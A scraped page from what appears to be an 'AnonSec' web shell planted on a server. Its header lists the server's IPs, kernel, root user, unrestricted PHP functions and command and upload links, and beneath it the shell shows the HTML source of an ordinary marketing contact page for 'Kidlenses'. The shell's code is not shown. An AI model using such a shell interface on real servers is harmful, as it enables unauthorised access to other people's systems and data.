|
Server IP : 149.13.87.7 / Your IP : 185.174.145.2 Web Server : nginx System : Linux h2 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64 User : root ( 0) PHP Version : 8.0.28 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /mnt/platforms/workspaces/shortable.org/../amavezon.com/../kidlenses.club/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Contact Kidlenses</title>
<script src="https://cdn.tailwindcss.com"></script>
<link href="https://cdnjs.cloudflare.com/ajax/libs/flowbite/2.2.0/flowbite.min.css" rel="stylesheet" />
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Inter:wght@300;400;500;600;700;800;900&family=Plus+Jakarta+Sans:wght@300;400;500;600;700;800;900&display=swap" rel="stylesheet">
<style>
body {
font-family: 'Inter', sans-serif;
padding-top: 80px;
}
h1, h2, h3, h4, h5, h6 {
font-family: 'Plus Jakarta Sans', sans-serif;
}
.contact-hero {
background: linear-gradient(135deg, rgba(15,23,42,0.85), rgba(30,64,175,0.85)), url('https://images.unsplash.com/photo-5fNmWej4tAA?w=1200&h=800&fit=crop&auto=format&q=80') center/cover;
}
</style>
<link rel="stylesheet" href="assets/css/dynamic.css">
</head>
<body class="antialiased bg-gray-50">
<nav class="bg-gray-900 fixed w-full z-50 top-0">
<div class="max-w-screen-xl mx-auto px-6 py-2 flex items-center justify-between">
<a href="./" class="flex items-center space-x-4 text-white">
<div class="flex items-center justify-center w-12 h-12 rounded-full bg-white/10 border border-white/20 text-2xl font-black">
<i class="fas fa-bolt"></i>
</div>
<div>
<div class="text-xs uppercase tracking-[0.3em] text-white/50">Growth Catalysts</div>
<div class="text-3xl font-black tracking-tight">Kidlenses</div>
</div>
</a>
<div class="hidden lg:flex items-center space-x-10 text-white/80">
<a href="#services" class="font-semibold hover:text-white transition">Services</a>
<a href="#features" class="font-semibold hover:text-white transition">Capabilities</a>
<a href="#about" class="font-semibold hover:text-white transition">About</a>
<a href="#testimonials" class="font-semibold hover:text-white transition">Clients</a>
</div>
<div class="hidden lg:flex items-center space-x-4">
<a href="mailto:hello@kidlenses.club" class="text-sm text-white/70">Email hello@kidlenses.club</a>
<a href="#contact" class="px-6 py-3 bg-white text-gray-900 font-bold rounded-full shadow-xl hover:shadow-2xl transition">Schedule Demo</a>
</div>
<button data-collapse-toggle="navbar-17" type="button" class="lg:hidden inline-flex items-center justify-center w-11 h-11 rounded-lg bg-white/10 text-white">
<svg class="w-6 h-6" fill="none" viewBox="0 0 24 24" stroke="currentColor">
<path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M4 6h16M4 12h16M4 18h16" />
</svg>
</button>
</div>
<div class="hidden bg-gray-900 text-white" id="navbar-17">
<div class="px-6 pb-6 space-y-4">
<a href="#services" class="block font-semibold">Services</a>
<a href="#features" class="block font-semibold">Capabilities</a>
<a href="#about" class="block font-semibold">About</a>
<a href="#testimonials" class="block font-semibold">Clients</a>
<a href="#contact" class="block text-center px-5 py-3 rounded-lg bg-white text-gray-900 font-semibold">Schedule Demo</a>
</div>
</div>
</nav>
<section class="py-24 bg-gradient-to-b from-white to-gray-100">
<div class="max-w-5xl mx-auto px-6 text-center space-y-6">
<span class="inline-block px-4 py-1 bg-white rounded-full border border-gray-200 text-xs uppercase tracking-[0.3em] text-gray-500">Calm, clear communication</span>
<h1 class="text-4xl md:text-5xl font-semibold text-gray-900">Share your vision with Kidlenses</h1>
<p class="text-lg text-gray-600 max-w-3xl mx-auto">We align creative, strategy, and delivery teams so every touchpoint feels seamless.</p>
<div class="flex items-center justify-center space-x-3 text-sm text-gray-500">
<i class="fas fa-sparkles text-indigo-500"></i>
<span>Human support</span>
</div>
</div>
</section>
<section class="bg-white py-20">
<div class="max-w-6xl mx-auto px-6 lg:px-12">
<div class="grid md:grid-cols-3 gap-10">
<div class="p-6 rounded-3xl border border-gray-100 shadow-sm">
<h3 class="text-xl font-semibold text-gray-900 mb-3">Discovery workshop</h3>
<p class="text-gray-600">Define goals, audiences, and constraints in a guided 60-minute session.</p>
</div>
<div class="p-6 rounded-3xl border border-gray-100 shadow-sm">
<h3 class="text-xl font-semibold text-gray-900 mb-3">Experience maps</h3>
<p class="text-gray-600">We translate your workflows into service blueprints and prototypes.</p>
</div>
<div class="p-6 rounded-3xl border border-gray-100 shadow-sm">
<h3 class="text-xl font-semibold text-gray-900 mb-3">Launch stewardship</h3>
<p class="text-gray-600">Our team stays with you post-launch to monitor performance and iterate.</p>
</div>
</div>
</div>
</section>
<section class="bg-gray-900 text-white py-20">
<div class="max-w-4xl mx-auto px-6 text-center space-y-6">
<p class="text-2xl leading-relaxed">They behave like an in-house team—calm, prepared, and proactive.</p>
<p class="text-sm uppercase tracking-widest text-white/60">Client feedback, Q3 Pulse</p>
</div>
</section>
<section class="bg-gray-50 py-16">
<div class="max-w-5xl mx-auto px-6">
<section class="bg-gradient-to-br from-gray-50 to-white py-20" id="contact">
<div class="max-w-screen-md mx-auto px-4">
<div class="text-center mb-12">
<div class="inline-block px-4 py-2 mb-4 bg-indigo-100 text-indigo-800 rounded-full text-sm font-semibold">
Get In Touch
</div>
<h2 class="text-4xl md:text-5xl font-extrabold text-gray-900 mb-4"></h2>
<p class="text-xl text-gray-600">Fill out the form below and our team will get back to you within 24 hours</p>
</div>
<form action="#" class="bg-white p-8 md:p-10 rounded-3xl shadow-2xl border border-gray-100">
<div class="grid md:grid-cols-2 gap-6 mb-6">
<div>
<label for="name" class="block mb-2 text-sm font-semibold text-gray-900">First Name</label>
<input type="text" id="name" class="bg-gray-50 border border-gray-300 text-gray-900 rounded-lg focus:ring-indigo-500 focus:border-indigo-500 block w-full p-3.5" placeholder="John" required>
</div>
<div>
<label for="lastname" class="block mb-2 text-sm font-semibold text-gray-900">Last Name</label>
<input type="text" id="lastname" class="bg-gray-50 border border-gray-300 text-gray-900 rounded-lg focus:ring-indigo-500 focus:border-indigo-500 block w-full p-3.5" placeholder="Doe" required>
</div>
</div>
<div class="mb-6">
<label for="email" class="block mb-2 text-sm font-semibold text-gray-900">Email Address</label>
<input type="email" id="email" class="bg-gray-50 border border-gray-300 text-gray-900 rounded-lg focus:ring-indigo-500 focus:border-indigo-500 block w-full p-3.5" placeholder="john@example.com" required>
</div>
<div class="mb-6">
<label for="subject" class="block mb-2 text-sm font-semibold text-gray-900">Subject</label>
<select id="subject" class="bg-gray-50 border border-gray-300 text-gray-900 rounded-lg focus:ring-indigo-500 focus:border-indigo-500 block w-full p-3.5">
<option selected>Choose a topic</option>
<option value="general">General Inquiry</option>
<option value="support">Customer Support</option>
<option value="sales">Sales Question</option>
<option value="feedback">Feedback</option>
</select>
</div>
<div class="mb-6">
<label for="message" class="block mb-2 text-sm font-semibold text-gray-900">Message</label>
<textarea id="message" rows="6" class="bg-gray-50 border border-gray-300 text-gray-900 rounded-lg focus:ring-indigo-500 focus:border-indigo-500 block w-full p-3.5" placeholder="Your message here..." required></textarea>
</div>
<button type="submit" class="w-full py-4 text-base font-bold text-white bg-gradient-to-r from-indigo-600 to-violet-600 rounded-lg hover:shadow-xl transition-all">
Send Message →
</button>
</form>
<div class="grid md:grid-cols-3 gap-6 mt-12 text-center">
<div class="p-4">
<div class="w-12 h-12 bg-indigo-100 rounded-full flex items-center justify-center mx-auto mb-3">
<i class="fas fa-phone text-indigo-600"></i>
</div>
<p class="text-sm font-semibold text-gray-900">+1-623-395-9784</p>
</div>
<div class="p-4">
<div class="w-12 h-12 bg-indigo-100 rounded-full flex items-center justify-center mx-auto mb-3">
<i class="fas fa-envelope text-indigo-600"></i>
</div>
<p class="text-sm font-semibold text-gray-900">hello@kidlenses.club</p>
</div>
<div class="p-4">
<div class="w-12 h-12 bg-indigo-100 rounded-full flex items-center justify-center mx-auto mb-3">
<i class="fas fa-map-marker-alt text-indigo-600"></i>
</div>
<p class="text-sm font-semibold text-gray-900">963 Arizona Avenue, Phoenix, AZ 85003</p>
</div>
</div>
</div>
</section>
</div>
</section>
<footer class="bg-gradient-to-br from-gray-900 via-gray-800 to-gray-900 text-white py-16">
<div class="max-w-screen-xl mx-auto px-4">
<div class="grid md:grid-cols-4 gap-12 mb-12">
<div class="md:col-span-2">
<a href="./" class="flex items-center space-x-3 mb-6">
<div class="w-14 h-14 bg-gradient-to-br from-indigo-500 to-violet-600 rounded-xl flex items-center justify-center shadow-lg">
<span class="text-white font-bold text-xl">K</span>
</div>
<span class="text-3xl font-black">Kidlenses</span>
</a>
<p class="text-gray-400 mb-6 max-w-md leading-relaxed">Transforming businesses with innovative solutions and exceptional service.</p>
<div class="flex space-x-4">
<a href="#" class="w-12 h-12 bg-white/10 hover:bg-indigo-600 rounded-xl flex items-center justify-center transition-all backdrop-blur-sm border border-white/20">
<i class="fab fa-facebook-f"></i>
</a>
<a href="#" class="w-12 h-12 bg-white/10 hover:bg-indigo-600 rounded-xl flex items-center justify-center transition-all backdrop-blur-sm border border-white/20">
<i class="fab fa-twitter"></i>
</a>
<a href="#" class="w-12 h-12 bg-white/10 hover:bg-indigo-600 rounded-xl flex items-center justify-center transition-all backdrop-blur-sm border border-white/20">
<i class="fab fa-linkedin-in"></i>
</a>
<a href="#" class="w-12 h-12 bg-white/10 hover:bg-indigo-600 rounded-xl flex items-center justify-center transition-all backdrop-blur-sm border border-white/20">
<i class="fab fa-instagram"></i>
</a>
</div>
</div>
<div>
<h3 class="text-lg font-bold mb-6 text-white">Quick Links</h3>
<ul class="space-y-3 text-gray-400">
<li><a href="./about-us.php" class="hover:text-indigo-400 transition-colors">About Us</a></li>
<li><a href="#services" class="hover:text-indigo-400 transition-colors">Services</a></li>
<li><a href="#testimonials" class="hover:text-indigo-400 transition-colors">Testimonials</a></li>
<li><a href="./contact.php" class="hover:text-indigo-400 transition-colors">Contact</a></li>
<li><a href="blog/" class="hover:text-indigo-400 transition-colors">Blog</a></li>
</ul>
</div>
<div>
<h3 class="text-lg font-bold mb-6 text-white">Legal</h3>
<ul class="space-y-3 text-gray-400">
<li><a href="./privacy.php" class="hover:text-indigo-400 transition-colors">Privacy Policy</a></li>
<li><a href="./terms.php" class="hover:text-indigo-400 transition-colors">Terms of Service</a></li>
<li><a href="./disclaimer.php" class="hover:text-indigo-400 transition-colors">Disclaimer</a></li>
</ul>
</div>
</div>
<div class="border-t border-gray-800 pt-8">
<div class="flex flex-col md:flex-row justify-between items-center">
<p class="text-gray-400 text-sm">© 2026 Kidlenses. All rights reserved.</p>
<div class="flex items-center gap-2 mt-4 md:mt-0">
<span class="text-gray-400 text-sm">Made with</span>
<i class="fas fa-heart text-indigo-500"></i>
</div>
</div>
</div>
</div>
</footer>
<script src="https://cdnjs.cloudflare.com/ajax/libs/flowbite/2.2.0/flowbite.min.js"></script>
</body>
</html>
AnonSec - 2021